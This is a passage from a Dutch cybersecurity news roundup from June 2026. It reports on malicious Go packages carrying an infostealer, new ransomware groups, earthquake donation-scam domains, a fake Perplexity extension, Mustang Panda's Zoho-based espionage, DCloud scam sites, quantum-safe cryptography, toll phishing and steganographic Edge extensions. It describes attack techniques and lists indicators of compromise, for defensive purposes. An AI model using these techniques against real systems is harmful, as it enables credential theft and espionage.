Parallel hieraan lanceert de infectieketen een Python-loadercomponent die verantwoordelijk is voor het ophalen van de Python-informatiesteler van de C2-server en het installeren van de benodigde afhankelijkheden. Deze infostealer is breed inzetbaar en kan gegevens stelen uit Chromium-gebaseerde en Mozilla Firefox-browsers, wachtwoordmanagers, authenticators en cryptocurrency wallets. Het is ook in staat om ontwikkelaarsgerelateerde informatie te oogsten, zoals Git-credentials, GitHub CLI hosts.yml, GitHub Desktop-logs, VS Code- en globale opslaggegevens, evenals data uit Windows Credential Manager, Linux Secret Service, KDE Wallet, macOS Keychain en cloud storage metadata voor Dropbox, Google Drive, Microsoft OneDrive, Apple iCloud, Box, Mega en pCloud. De verzamelde gegevens worden uiteindelijk in gecomprimeerde ZIP-archieven verpakt en geüpload naar de C2-server, en naar een Telegram bots indien een bot-token door de aanvaller wordt verstrekt.

Nextron Systems ontdekte ook een reeks van zestien Go-pakketten die dezelfde malware bevatten. Deze pakketten omvatten onder andere `github.com/lambda-platform/lambda`, `github.com/reauheau/goaubio`, `github.com/glacialspring/go-winsparkle`, `github.com/bm-197/chill`, `github.com/naol7/dist-task-scheduler`, `github.com/anatoli-derese/a2sv-excercise`, `github.com/amantsehay/a2sv-go-course`, `github.com/dexbotsdev/uniswap-v2-v3-arbitrage`, `github.com/lambda-platform/ebarimt-rest-api`, `github.com/lambda-platform/dan`, `github.com/zainirfan13/graphql-client`, `github.com/hngi/team-fierce-backend-golang`, `github.com/glacialspring/static`, `github.com/rickt/slack-weather-bot`, `github.com/Barsu5489/commerce` en `github.com/Setsu548/Logistic`. Volgens JFrog lijken de meeste hiervan legitieme pakketten te zijn waarvan de nieuwste uitgebrachte versie de malware bevatte naast de originele pakketinhoud, met dezelfde structuur en nep-lettertypebestand.

Gebruikers die deze pakketten hebben geïnstalleerd, wordt geadviseerd deze onmiddellijk te verwijderen, ontwikkelmachines te doorzoeken op verborgen VS Code folder-open taken en alle referenties, tokens, cloud-credentials, API-sleutels, in de browser opgeslagen referenties en wallet-credentials te roteren. De payloads tonen aan dat de aanvaller geïnteresseerd was in zowel directe diefstal als interactieve toegang. De Socket.io-gebaseerde backdoor biedt commando-uitvoering en bestandsverzameling, terwijl de Python-fase een brede oogst van referenties en wallets uitvoert over browsers, OS-referentieopslagsystemen, ontwikkeltools en cryptocurrency-applicaties.

 

Bron: JFrog | Bron 2: dti.domaintools.com

29 juni 2026 | Twee nieuwe ransomwaregroepen geïdentificeerd: REDACT en SETTRA

Via darkweb-monitoring zijn recentelijk twee nieuwe ransomware- en afpersingsgroepen geïdentificeerd, bekend als REDACT en SETTRA. Beide groepen opereren met verschillende tactieken, maar vormen een nieuwe dreiging voor organisaties.

De groep REDACT kwam in mei 2026 in beeld, nadat de eerder bekende groep achter het merk BlackFile dat merk introk. Onderzoekers hebben overeenkomsten vastgesteld met de dreigingscluster UNC6671 en zien een verband met The Com, een los samenwerkingsverband van voornamelijk Engelstalige criminelen, simswappers en afpersers. REDACT is puur financieel gedreven en maakt gebruik van vishing (telefoonphishing). Daarbij doen de aanvallers zich voor als interne ICT-helpdeskmedewerkers om zo inloggegevens en MFA-codes van slachtoffers te ontfutselen. Na succesvolle toegang stelen zij data uit bedrijfsmatige cloudopslag, die vervolgens wordt ingezet om losgeld af te dwingen. De groep heeft inmiddels minstens twee slachtoffers op haar leksite gepubliceerd en stelt niet te onderhandelen met organisaties die niet betalen.

De tweede nieuwe groep, SETTRA, verscheen in juni 2026. Deze groep hanteert de methode van dubbele afpersing, waarbij zowel data wordt gestolen als systemen worden versleuteld. SETTRA heeft een eigen lekomgeving op het darkweb waar gestolen informatie wordt gepubliceerd, en gebruikt een Tox-chat voor communicatie met slachtoffers.

Beide groepen zijn nieuw en worden nog actief in kaart gebracht. Concrete claims over slachtoffers en de exacte omvang van hun operaties zijn vooralsnog vermeend en zijn niet onafhankelijk geverifieerd. Voor Nederlandse en Belgische organisaties is het patroon van deze nieuwe dreigingsactoren bijzonder relevant, met name de methoden van binnenkomst via nep helpdeskgesprekken en het misbruiken van gestolen inloggegevens. Dit onderstreept het belang van sterke authenticatie en bewustzijnstrainingen.

 

Bron: Cybercrimeinfo

30 juni 2026 | Waarschuwing voor donatiefraude na snelle registratie van Venezuela aardbeving domeinen

Naar aanleiding van de recente aardbeving in Venezuela is een aanzienlijke toename van nieuwe internetdomeinen waargenomen die de ramp exploiteren. Onderzoekers waarschuwen dat deze websites, die zich voordoen als donatiepagina's, lijsten voor vermiste personen en verzoeken om cryptobetalingen, zorgvuldige controle vereisen voordat mensen geld of persoonlijke gegevens delen.

WhoisXML API, een aanbieder van informatie over cyberdreigingen, identificeerde tussen 24 en 28 juni 2026 maar liefst 212 nieuw geregistreerde domeinen die expliciet verwijzen naar de aardbeving in Venezuela. Deze namen werden gefilterd op termen gerelateerd aan Venezuela, lokale plaatsnamen, aardbeving gerelateerde woorden en hulp gerelateerde zinnen. Voordat de aardbeving, met een voorschok van 7.2 en een hoofdschok van 7.5 op 24 juni, plaatsvond, werden geen soortgelijke domeinen waargenomen. De activiteit begon op de dag van de ramp en bereikte een piek op 25 juni, toen 105 van de 212 domeinen werden geregistreerd. Verdere registraties volgden met 60 op 26 juni, 29 op 27 juni en 15 op 28 juni.

Deze snelle toename valt samen met een humanitaire crisis, waarin reddingsoperaties en oproepen tot donaties een omgeving creëren waar legitieme hulp en frauduleuze activiteiten naast elkaar kunnen bestaan. Veel van de geïdentificeerde domeinen gebruiken taal die op het eerste gezicht behulpzaam lijkt: 110 namen lijken verband te houden met hulp of donaties, 52 gebruiken 'SOS' of reddingsgerelateerde termen, 56 verwijzen naar aardbevingen, en 12 naar vermiste of getroffen personen. Andere namen duiden op medische hulp, opvang, informatiepagina's, kaarten en trackingdiensten.

Hoewel niet alle domeinen per definitie kwaadaardig zijn, is verificatie voor het publiek vaak moeilijk, met name wanneer er om geld of persoonlijke gegevens wordt gevraagd. Een opvallend aspect is de eigendom: 93 procent van de domeinen toonde geen individueel e-mailadres van de registrant, hetzij door privacy diensten, hetzij doordat er geen direct contact was vermeld.

De domeinen zijn verspreid over 28 registrars en 20 top level domeinen (TLD's). Namecheap nam het grootste aandeel voor zijn rekening met 46 domeinen, gevolgd door Name.com met 43, GoDaddy met 28, Cloudflare met 25 en Hostinger met 23. De infrastructuur wijst niet op één enkele operator; het patroon duidt meer op een gelijktijdige golf van afzonderlijke registraties dan op één gecoördineerde bulkoperatie.

Het grootste risico ligt bij pagina's die donaties vragen zonder duidelijke bewijzen van wie de site beheert of waar het geld naartoe gaat. Alexandre François, DNS dreigingsonderzoeker bij WhoisXML API, merkte op dat sommige actieve pagina's reeds vragen om cryptovaluta donaties, inclusief Bitcoin, zonder duidelijke bevestiging dat de fondsen de slachtoffers zullen bereiken. De exploitatie van rampen is een bekend fenomeen, zoals eerder gezien bij hulpacties voor Gaza, de bosbranden in Californië in 2025 en de COVID-19 pandemie, die leidden tot phishingcampagnes, nep liefdadigheidsinstellingen en malware.

Daarom wordt dringend geadviseerd om organisaties te verifiëren via hun officiële kanalen, te controleren of een domein recentelijk is aangemaakt, en cryptobetalingen te vermijden die niet gekoppeld zijn aan een benoemde liefdadigheidsinstelling, registratiegegevens of transparante informatie over fondsenbeheer. Ook bij het delen van meldingen over vermiste personen is voorzichtigheid geboden: informatie die alleen op een na de aardbeving gecreëerde site staat, mag niet als geverifieerd worden beschouwd zonder vergelijking met officiële platforms.

 

Bron: WhoisXML API

30 juni 2026 | Kwaadaardige Perplexity Chrome-extensie onderschepte zoekopdrachten

Microsoft heeft een kwaadaardige Chrome-extensie ontdekt die zich voordeed als de populaire AI zoekmachine Perplexity. Deze extensie onderschepte ongemerkt de zoekopdrachten van gebruikers en alle tekens die in de adresbalk werden ingevoerd. Voordat gebruikers werden omgeleid naar de daadwerkelijke zoekresultaten, werden alle gegevens via een door aanvallers gecontroleerde server gerouteerd. Deze dreiging kan wereldwijd gebruikers treffen, inclusief die in Nederland en België.

Google heeft de extensie inmiddels uit de Chrome Web Store verwijderd na een melding van Microsoft. De extensie droeg de naam "Search for perplexity ai" en had de ID `flkebkiofojicogddingbdmcmkpbplcd`. Om zich voor te doen als de legitieme dienst, maakte de extensie gebruik van een look-alike domein, `perplexity-ai[.]online`, dat sterk leek op het echte domein `perplexity.ai`.

Het onderzoeksteam van Microsoft Defender stelt dat het primaire doel van de extensie het onderscheppen van zoekopdrachten en het verzamelen van gebruikersgegevens was. Hoewel er geen bewijs is gevonden van diefstal van wachtwoorden, had de extensie aanzienlijk meer toegang dan een gewone zoekbalk extensie zou moeten hebben.

Na installatie stelde de extensie zichzelf in als de standaard zoekmachine van de browser. Wanneer een gebruiker een zoekopdracht uitvoerde, ging deze eerst naar `perplexity-ai[.]online`. Hier logde de server van de aanvaller de zoekopdracht, samen met de browser headers, het IP-adres van de gebruiker en de user agent. Vervolgens werd de gebruiker via een omleiding doorgestuurd naar een legitieme zoekmachine, zoals Perplexity, Google of Bing, waardoor de resultaten normaal leken. De gegevensdiefstal vond plaats tijdens deze eerste stap, voordat de omleiding plaatsvond.

De functionaliteit van de adresbalk werd eveneens misbruikt. De extensie leidde de live zoek suggesties van de browser (de `suggest_url`) ook om naar hetzelfde aanvaller domein. Dit betekende dat niet alleen voltooide zoekopdrachten, maar ook elk afzonderlijk karakter dat door de gebruiker werd getypt, naar de server van de aanvaller werd gestuurd nog voordat de Enter toets werd ingedrukt.

Chrome staat overrides van zoekproviders toe, en legitieme extensies maken hier gebruik van. Echter, het herschrijven en omleiden van gebruikersverkeer is geen gepaste handeling voor een zoekextensie. Deze specifieke extensie vroeg om de `declarativeNetRequest` familie van permissies om precies dit te doen, en gebruikte vervolgens server-side code om elke aanvraag te loggen. Microsoft beschouwt dit als bewijs dat de gegevensverzameling opzettelijk was en niet slechts een neveneffect van de omleiding.

Verder bevatte de extensie gedeactiveerde omleidingsregels voor Google en Bing, wat impliceert dat dezelfde functionaliteit ook voor deze zoekmachines had kunnen worden ingeschakeld. Ook was er ruimte voor het uitvoeren van WebAssembly code, een functionaliteit die voor een eenvoudige zoektool geen noodzaak heeft.

Deze ontdekking past in een bredere trend van kwaadaardige extensies die zich verschuilen achter AI branding. Eerdere gevallen omvatten extensies die de standaard zoekmachine wisselen om typ invoer vast te leggen, zoekproviders kapen of ChatGPT en DeepSeek chats skimmen. Eerder onderzoek van Microsoft toonde aan dat de golf van chat-skimming extensies verantwoordelijk was voor ongeveer 900.000 installaties binnen meer dan 20.000 bedrijfsnetwerken. Het verschil met deze nieuwe extensie is de focus: niet de AI chats, maar de zoekopdrachten en de tekens die in de adresbalk worden ingetypt, verzameld via de eigen extensie functionaliteit van Chrome.

Gebruikers die "Search for perplexity ai" hebben geïnstalleerd, wordt geadviseerd deze onmiddellijk te verwijderen en te controleren of hun standaard zoekmachine niet is gewijzigd. Voor organisaties adviseert Microsoft de volgende basisprincipes: sta alleen goedgekeurde extensies toe via browser- of bedrijfsbeleid; let op gewijzigde zoekinstellingen, ongebruikelijke extensie permissies en verkeer naar onbekende domeinen; en behandel tools met AI branding met extra argwaan door de uitgever en het domein te controleren vóór installatie.

De identiteit van de operator is niet bekendgemaakt, en Microsoft heeft niet vermeld hoeveel mensen de extensie hebben geïnstalleerd voordat deze werd verwijderd. De AI branding zorgde voor de installaties, en de zoek override deed het verzamelwerk.

 

Bron: Microsoft

30 juni 2026 | Mustang Panda misbruikt Zoho WorkDrive voor spionage tegen Indiase overheid

De aan China gelinkte spionagegroep Mustang Panda voert momenteel twee campagnes uit gericht op de Indiase overheid en bedrijven in de waterkrachtsector. De groep zet hierbij nieuwe malware in en misbruikt een legitieme cloudservice, Zoho WorkDrive, als command-and-control (C2) kanaal. Dit is ontdekt door Acronis Threat Research Unit, die actieve compromitteringen aantrof binnen Indiase overheidsnetwerken, inclusief machines die werden gebruikt door senior administratief personeel. Acronis heeft samengewerkt met CERT-In voor de notificatie en opschoning.

De malware misbruikt Zoho WorkDrive, een cloudopslagplatform dat veel wordt gebruikt in de Indiase overheidssector, om commando’s door te geven en data te exfiltreren. Het voordeel hiervan voor de aanvallers is dat het netwerkverkeer eruitziet als normale cloudactiviteit, waardoor de spionageactiviteiten verborgen blijven binnen het netwerk van het slachtoffer.

Acronis heeft drie nieuwe tools geïdentificeerd die door Mustang Panda worden ingezet. De eerste is SHARDLOADER, een loader die functioneert door een kwaadaardige DLL via DLL sideloading uit te voeren met behulp van een legitiem ondertekend binair bestand. In een van de campagnes werd hiervoor een Solid PDF Creator-uitvoerbaar bestand gebruikt, en in de andere een Citrix Receiver-binair bestand. Deze loader implementeert vervolgens een van de twee andere implants.

MINIRECON is een herwerkte variant van de Toneshell-backdoor, die eerder door IBM X-Force werd gedocumenteerd. Deze variant communiceert nu via een WebSocket-verbinding over HTTPS. De meest innovatieve component is ZOHOMURK. Deze tool bevat hardcoded Zoho OAuth-referenties en gebruikt deze om een door de aanvaller beheerd WorkDrive-account als een 'dead drop' te exploiteren. Hierbij worden commando’s gelezen uit een inboxmap en gestolen output geschreven naar een outboxmap.

Beide campagnes beginnen met ZIP-archieven waarin de kwaadaardige DLL als verborgen is gemarkeerd. Acronis vermoedt dat de levering via spear phishing heeft plaatsgevonden. De lokmiddelen waren afgestemd op de doelwitten: de ene draaide om een voorstel voor samenwerking op het gebied van waterkracht, de andere om een memorandum van overeenstemming tussen Indiase en Taiwanese instellingen. Volgens Acronis is het doel om inlichtingen te verzamelen over India's waterkrachtplannen en defensiebanden met Taiwan. Acronis schrijft de activiteit met hoge zekerheid toe aan Mustang Panda.

Het rapport van Acronis benadrukt de hergebruikte Solid PDF Creator sideloading-keten, code-overlap met Toneshell, commandoservers die zich in hetzelfde netwerkblok bevinden als infrastructuur die IBM X-Force eerder aan de groep koppelde, en een terugkerende typfout, 'RunOnece', die in meerdere implants voorkomt. De operationele beveiliging van de aanvallers was beperkt, met hardcoded tokens, plaintext-identificaties en hergebruikte infrastructuur, wat analisten hielp de groep te identificeren. De actieve communicatie met de C2-server liep van 12 juni tot 22 juni 2026.

Deze campagne past in een patroon van aanhoudende aanvallen op Indiase doelwitten. In april koppelde Acronis de LOTUSLITE-backdoor van de groep aan aanvallen op de Indiase bankensector en Zuid-Koreaanse beleidskringen, eveneens via een legitieme cloudservice. De bredere Chinese interesse in India's energiesector gaat nog verder terug, met de RedEcho-campagne in 2021 die het elektriciteitsnet van het land met ShadowPad als doelwit had.

Er is geen specifieke patch om deze dreiging te mitigeren. De verdediging richt zich op het detecteren van de initiële levering en het misbruik van cloudservices. Acronis heeft indicators of compromise (IOC's) en hunting tips gepubliceerd, waaronder de persistence 'Run' sleutels, een geplande taak genaamd `SolidPDFPcl2Bmp`, het C2-domein `couldinstallup[.]com`, en Zoho user agents die verschijnen op niet-browserprocessen. Overheids- en energieorganisaties, vooral die betrokken zijn bij grensoverschrijdende deals die Peking mogelijk interesseren, moeten alert zijn op geopolitieke lokmiddelen en sideloading van ondertekende binaire bestanden. Ook is het raadzaam om elk endpointproces te markeren dat cloud-API's aanroept zonder daar een legitieme reden voor te hebben.

 

Bron: Acronis | Bron 2: recordedfuture.com

30 juni 2026 | Meer dan 236.000 DCloud Uni-App sites misbruikt voor crypto scams en phishing

Onderzoek van Infoblox heeft aangetoond dat meer dan 236.000 websites sjablonen voor investeringszwendel gebruiken die zijn gebouwd met DCloud Uni-App, een legitiem Chinees open-source, cross-platform applicatieontwikkelingsframework. Deze sjablonen worden ingezet voor het opzetten van valse cryptocurrency-exchanges, grootschalige pig butchering-operaties in meerdere talen, WhatsApp-phishingnetwerken, neppe gokplatforms, sites die merken imiteren, en crypto wallet drainers. Het DNS-bedrijf voor dreigingsinformatie heeft in totaal 236.493 afzonderlijke tweedegraadsdomeinen geïdentificeerd.

Infoblox stelt in een uitgebreid rapport dat de afgelopen twee jaar een drastische toename is geweest van zwendelwebsites die het DCloud-framework gebruiken. De beheerders van deze sites blijven complexe schema's lanceren om slachtoffers te misleiden. Onbekende dreigingsactoren verkopen vermoedelijk DCloud-sjablonen voor investeringszwendel, hoewel er aanwijzingen zijn voor gecentraliseerd eigendom van een aanzienlijk deel van de met DCloud gebouwde zwendelwebsites. Dit wordt afgeleid uit dalingen in nieuwe domeinregistraties die zijn waargenomen op diverse hosts, wat suggereert dat een centrale partij wordt verstoord of gecoördineerde wijzigingen aanbrengt in hun DCloud-investeringszwendelsites. Andere indicatoren zijn specifieke technische vingerafdrukken, communicatiemethoden naar slachtoffers en hostingkeuzes.

Een van de geïdentificeerde domeinen is het beruchte RainbowEx-platform, een frauduleuze cryptocurrency-exchange die eind 2024 in het nieuws kwam vanwege een Ponzi-schema dat tienduizenden mensen in San Pedro, Argentinië, trof. Later dat jaar werden zeven personen die gelinkt waren aan de operatie gearresteerd door wetshandhavingsautoriteiten.

Hoewel het gebruik van DCloud zelf geen indicator is van kwaadaardige intenties, heeft Infoblox gemeenschappelijke kenmerken geïdentificeerd onder de frauduleuze sites. Deze omvatten nep-makelaarsinterfaces, prompts voor het leegtrekken van cryptocurrency-wallets, gokinterfaces met gemanipuleerde uitkomsten, webwinkels die merken imiteren en bulletproof hosting. De malafide domeinen verspreiden zich over elk continent, richten zich op sprekers van minstens acht talen en doen zich voor als merken variërend van grote beurzen tot retailgiganten en berichtenplatforms. De frauduleuze operaties zijn sinds medio 2022 actief. Binnen de met DCloud-vingerafdrukken geïdentificeerde sites zijn twee gerelateerde, maar verschillende populaties naar voren gekomen: sites met de basiskenmerken van het DCloud Uni-App framework die teruggaan tot 2021 (inclusief zowel legitieme Chinese bedrijven als kwaadaardige operaties) en een investeringszwendel-specifieke subset die actief is sinds medio 2022.

Volgens Infoblox is de populatie van investeringszwendel feitelijk groter dan alleen de eenvoudige DCloud-frameworkvingerafdrukken doen vermoeden, omdat meer geavanceerde beheerders de standaard DCloud-structuur hebben verwijderd om detectie op basis van vingerafdrukken te omzeilen. Deze tweede reeks DCloud-zwendelwebsites wordt beheerd door meerdere ongerelateerde actoren en omvat een breed scala aan frauduleuze schema's, waaronder:

*   Valse cryptocurrency-exchanges en deposit-and-trade platforms die bekende exchanges imiteren en gebruikers verleiden tot investeringen, waarbij fictieve handelsactiviteiten worden getoond totdat slachtoffers hun geld proberen op te nemen.

*   Cryptocurrency wallet drainers die gebruikers verleiden hun wallets te verbinden door zich voor te doen als BNB Chain of Tether verificatiestromen.

*   Voorspellingsmarkt- en gokimitaties die Polymarket-achtige voorspellingsmarkten nabootsen, of valse casino's en loterijplatforms.

*   WhatsApp- en berichtenplatform-phishing die gericht is op het verzamelen van inloggegevens door zich voor te doen als het WhatsApp Security Help Center met lookalike-domeinen zoals "whats-zwp[.]vip" of "faq-whatsapp-center[.]com".

*   Generieke sjabloon-phishing en het verzamelen van inloggegevens via eenvoudige login- en registratiepagina's.

In de Verenigde Staten heeft hetzelfde scenario zich tweemaal gemanifesteerd in publiekelijk bekende operaties: eerst in de LSSC-investeringszwendel met deelscooters, die vorig jaar uitgroeide tot een groot federaal en staatsfraudeonderzoek, en ten tweede in een zwendel met fietsshare-investeringen die momenteel actief slachtoffers werft onder een in het VK geregistreerde bedrijfsfaçade met een legitieme Amerikaanse federale licentie voor financiële diensten. De scooter-investeringszwendel, gebouwd met het Uni-App framework, wordt uitgevoerd onder de merknaam Yuechi Sharing Technology Ltd. en richt zich voornamelijk op Australië, Nieuw-Zeeland en de VS. De frontend van Yuechi beschikt over een login- of registratieformulier; bij registratie wordt gebruikers gevraagd hun telefoonnummer, SMS-verificatiecode en een uitnodigingscode in te voeren die wordt gedeeld door een bestaande affiliate van het piramideschema.

Infoblox legt uit dat de "uitnodigingscode-poort" veelvoorkomend is op websites voor investeringszwendel: een potentiële slachtoffer kan geen account aanmaken of het stortingsscherm bereiken zonder eerst te zijn gerekruteerd door een bestaande affiliate. Deze vereiste komt overeen met het feit dat de meeste beheerders elk slachtoffer willen omzetten in een recruiter die vervolgens hun eigen vrienden, familie en collega's zal proberen te werven om meer investeringen binnen te halen en de piramide uit te bouwen. De site bevat ook een klantenservicecomponent die slachtoffers omleidt naar een externe gehoste chat met merknaam om problemen zoals registratiefouten, opnameblokkades en stortingsblokkades af te handelen.

De analyse van Infoblox van de met DCloud gebouwde infrastructuur voor investeringszwendel heeft bovendien uitgewezen dat de meeste domeinen worden gehost op legitieme providers zoals Cloudflare, Alibaba Cloud, Tencent Cloud en Amazon Web Services. Ongeveer 6% van de zichtbare met DCloud gebouwde investeringszwendel-domeinen maakt gebruik van bulletproof hosting-providers zoals CTG Server Limited (AS152194), die eerder is gemarkeerd voor kwaadaardige cyberactiviteit. Het bedrijf merkt op dat sites in de 'evasive tier', waar beheerders moeite hebben gedaan om de framework-signatuur te verdoezelen, bulletproof hosting gebruiken tegen ongeveer het dubbele tarief van de 'vanilla tier'.

 

Bron: Infoblox

30 juni 2026 | Kwantumdreiging vereist urgente overgang naar kwantumresistente cryptografie, focus op inloggegevens

Gecodeerde data, zoals inloggegevens, loopt in de toekomst het risico niet langer vertrouwelijk te blijven. De huidige cryptografie met publieke sleutels, die deze data beschermt, zal naar verwachting worden gebroken door kwantumcomputers. Hoewel er momenteel geen machines bestaan die elliptische curve cryptografie of RSA kunnen doorbreken, vordert de ontwikkeling van kwantumhardware snel. Dit zal onvermijdelijk de manier veranderen waarop organisaties hun data beveiligen. Aanvallers kunnen nu reeds versleutelde tekst en inloggegevens verzamelen en opslaan, om deze te decoderen zodra kwantumcomputers voldoende geavanceerd zijn.

De urgentie van kwantumresistente cryptografie wordt benadrukt in het "2025 Quantum Threat Timeline"-rapport van het Global Risk Institute. Beveiligingsspecialisten die hiervoor werden ondervraagd, geloven met 51 tot 70 procent zekerheid dat een cryptografisch relevante kwantumcomputer binnen vijftien jaar beschikbaar zal zijn. De dreiging dateert uit 1994, toen Peter Shor aantoonde dat een krachtige kwantumcomputer efficiënt grote getallen kon factoriseren en discrete logaritmen kon berekenen. Shor’s algoritme is echter van toepassing op cryptografie met publieke sleutels en vormt geen significante dreiging voor symmetrische encryptie zoals AES-256 of moderne hashing. Dit onderscheid is cruciaal, omdat cryptografie met publieke sleutels wordt gebruikt om vertrouwen tussen twee systemen te etableren en om sleutels overeen te komen die hun data beschermen. Als een kwantumcomputer deze stap kan doorbreken, kan een aanvaller de beschermde data en inloggegevens erachter ontgrendelen.

Wat de kwantumdreiging nu al relevant maakt, is de tactiek die bekendstaat als 'Harvest Now, Decrypt Later'. Hierbij onderschept een aanvaller vandaag versleuteld verkeer, slaat dit op, en decodeert het zodra een kwantumcomputer beschikbaar is. Met een capabele kwantumcomputer die naar verwachting binnen vijftien jaar beschikbaar is, moet alle data die vandaag wordt onderschept en verzameld, worden behandeld als reeds blootgestelde data.

Ondanks de onzekerheid over de exacte komst van een kwantumcomputer, stellen overheidsinstanties al deadlines vast voor de mijlpaal die bekendstaat als Q-day, de datum waarop cryptografie moet veranderen. De Commercial National Security Algorithm Suite 2.0 van de NSA vereist dat nieuwe nationale veiligheidssystemen vanaf 1 januari 2027 kwantumresistente algoritmen ondersteunen. Hoewel de deadlines voor verschillende systeemcategorieën tot in de vroege jaren 2030 gespreid zijn, hoopt de NSA alle nationale veiligheidssystemen tegen 2035 kwantumresistent te maken. NIST volgt een parallel traject met zijn concept IR 8547, dat RSA-2048 en ECC P-256 na 2030 afschrijft en na 2035 volledig verbiedt. Deze data lijken ver weg, maar een volledige bedrijfstransitie kan vijf tot vijftien jaar duren, aangezien alleen al de ontdekkingsfase in grote ondernemingen één tot twee jaar kan beslaan.

Niet alle versleutelde data binnen een organisatie draagt hetzelfde risico wanneer de beschermende cryptografie uiteindelijk verouderd raakt. De meeste geheimen, zoals sessietokens, hebben een vertrouwelijkheidstermijn die in maanden wordt gemeten; inloggegevens kunnen jarenlang of zolang de bijbehorende systemen in gebruik blijven, aanhouden. Voor aanvallers maakt dit inloggegevens de moeite waard om nu al te verzamelen en vast te houden totdat een kwantumcomputer ze kan decoderen. De omvang van dit probleem maakt het een groot beveiligingsrisico, vooral omdat de meeste organisaties een groeiend aantal niet-menselijke identiteiten (NHI's) hebben, zoals service-accounts en API-sleutels. Deze machine-inloggegevens hebben vaak een lange levensduur omdat geen menselijke gebruiker verantwoordelijk is voor het regelmatig wijzigen ervan, en ze zijn waarschijnlijk niet geïnventariseerd op cryptografische blootstelling, wat ze ideale doelwitten maakt voor verzameling.

Aangezien het grootste risico geconcentreerd is in inloggegevens, moet de migratie ook daarmee beginnen. Organisaties moeten een "credentials-first" aanpak hanteren voor kwantummigratie door de volgende stappen te ondernemen:

*   **Inventariseer bestaande cryptografie:** De belangrijkste reden dat migraties zulke langdurige processen zijn, is dat organisaties hun cryptografische afhankelijkheden niet kunnen specificeren. Een inventarisatie die begint met inloggegevens omvat het vinden van systemen die geheimen bewaren of beheren, inclusief wachtwoordmanagers, secrets managers en Privileged Access Management (PAM)-platforms. Deze fase zal waarschijnlijk vergeten service-accounts, hardgecodeerde geheimen of integraties die jarenlang inactief zijn geweest, aan het licht brengen.

*   **Prioriteer risico boven omvang:** Hoewel organisaties hun grootste systemen willen beschermen, is het slimmer om de vertrouwelijkheidstermijn te prioriteren op basis van blootstelling, zoals hoe lang een geheim privé moet blijven, gecombineerd met hoe bereikbaar het is voor een aanvaller. Met deze logica weegt een klein, langdurig geheim dat toegang verleent tot kritieke systemen zwaarder dan een enorme maar kortstondige dataset. Door risico op deze manier te prioriteren, worden de inloggegevens die het meest kwetsbaar zijn voor 'Harvest Now, Decrypt Later' als eerste beveiligd.

*   **Migreer naar hybride cryptografie:** In plaats van klassieke algoritmen volledig te vervangen, moeten organisaties hybride cryptografie adopteren door een klassiek algoritme te combineren met een kwantumresistent algoritme in dezelfde sleuteluitwisseling. Dit houdt een verbinding beschermd tegen zowel de traditionele aanvallers van vandaag als toekomstige kwantumaanvallers. Hybride cryptografie voorkomt ook dat organisaties alles inzetten op één enkel, relatief nieuw algoritme, aangezien de klassieke component blijft bestaan en niets wordt verwijderd om kwantumresistente bescherming toe te voegen.

*   **Bouw voor crypto-agility:** Gezien het feit dat algoritmen worden afgeschreven en parameters veranderen, moeten organisaties verwachten dat de huidige migratie niet de laatste zal zijn. Bouw met crypto-agility in gedachten: op die manier zijn cryptografische algoritme-swaps configuratiewijzigingen in plaats van grote herontwerprevisies. Voor inloggegevens betekent dit in het bijzonder dat cryptografie op een gecentraliseerde locatie wordt bewaard, zodat wanneer het algoritme moet worden gewijzigd, het slechts één keer kan worden bijgewerkt in plaats van over meerdere applicaties, pijplijnen en integraties te moeten worden aangepast.

De drang om kwantumresistente cryptografie uit te stellen mag dan sterk zijn, organisaties moeten onthouden dat kwantummigratie een langdurig proces is en dat de voorbereiding nu al moet beginnen.

 

Bron: keepersecurity.com | Bron 2: globalriskinstitute.org

30 juni 2026 | Safeonweb waarschuwt voor phishing rond Franse tolwegen

Reizigers die deze zomer gebruikmaken van de Franse snelwegen met tolwegen, worden gewaarschuwd voor een actieve phishingcampagne. Oplichters versturen valse e-mails namens Ulys, een bekende aanbieder van tolbadges in Frankrijk. In deze frauduleuze berichten wordt beweerd dat een recente tolbetaling niet kon worden afgerond en dat er snel een klein bedrag, vaak enkele euro’s, betaald moet worden om boetes te voorkomen. Het doel van deze aanval is het stelen van persoonlijke en bankgegevens via een frauduleuze link.

De waarschuwing is afkomstig van Safeonweb, de Belgische overheidsdienst die burgers informeert over online veiligheid. De dienst adviseert om extra waakzaam te zijn voor de kenmerken van deze oplichting. Een belangrijke indicator is dat de link in de e-mail niet leidt naar de officiële website van Ulys. Daarnaast heeft het e-mailadres van de afzender vaak een ongebruikelijk of verdacht uiterlijk. De berichten zetten ontvangers onder druk om snel actie te ondernemen, wat een veelvoorkomende tactiek is bij phishing. Het gevraagde bedrag is opzettelijk laag gehouden om argwaan te verminderen.

Om dergelijke oplichting te voorkomen, geeft Safeonweb concrete tips. Controleer altijd het e-mailadres van de afzender door met de muis over de naam te gaan, of door op een smartphone of tablet de vinger op de link te houden om de volledige URL te zien. Wees kritisch bij verdachte adressen en links. Mocht een dergelijk bericht ontvangen worden, dan adviseert Safeonweb om de e-mail door te sturen naar verdacht@safeonweb.be en deze vervolgens te verwijderen. Indien er toch geld is gestolen, dienen slachtoffers snel actie te ondernemen en de richtlijnen op de website van Safeonweb te volgen.

 

Bron: Safeonweb

30 juni 2026 | Microsoft verwijdert 119 Edge-extensies met verborgen malware

Microsoft heeft een omvangrijke en langlopende operatie met kwaadaardige extensies in de Edge Add-ons store stopgezet. De aanvallers verborgen hun payloads in gewone afbeeldings- en lettertypebestanden. De extensies bleven dagen na installatie inactief om vervolgens inloggegevens te stelen en advertentiefraude te plegen.

Het bedrijf noemt de campagne 'StegoAd', een combinatie van steganografie en adware. Microsoft koppelt 119 extensies aan één enkele dreigingsactor die sinds ten minste 2021 actief is. De extensies waren veelvoorkomende tools zoals adblockers, VPN's, vertalers en videodownloaders, die allemaal hun functie vervulden en positieve recensies kregen. De kwaadaardige code bleef echter verborgen totdat de extensie een reeks ontwijkingscontroles doorstond, waardoor deze jarenlang onopgemerkt in de store kon blijven.

De 119 extensies hadden een gezamenlijk installatiebereik van maximaal 2,6 miljoen gebruikers. Microsoft benadrukt dat dit een bovengrens is en niet het daadwerkelijke aantal slachtoffers. Door een vertraging van meerdere dagen, validatie aan de serverzijde en een uitvoeringsdrempel van 10% bij sommige varianten, werd de payload bij veel installaties nooit geactiveerd. Het exacte aantal gecompromitteerde gebruikers is onbekend.

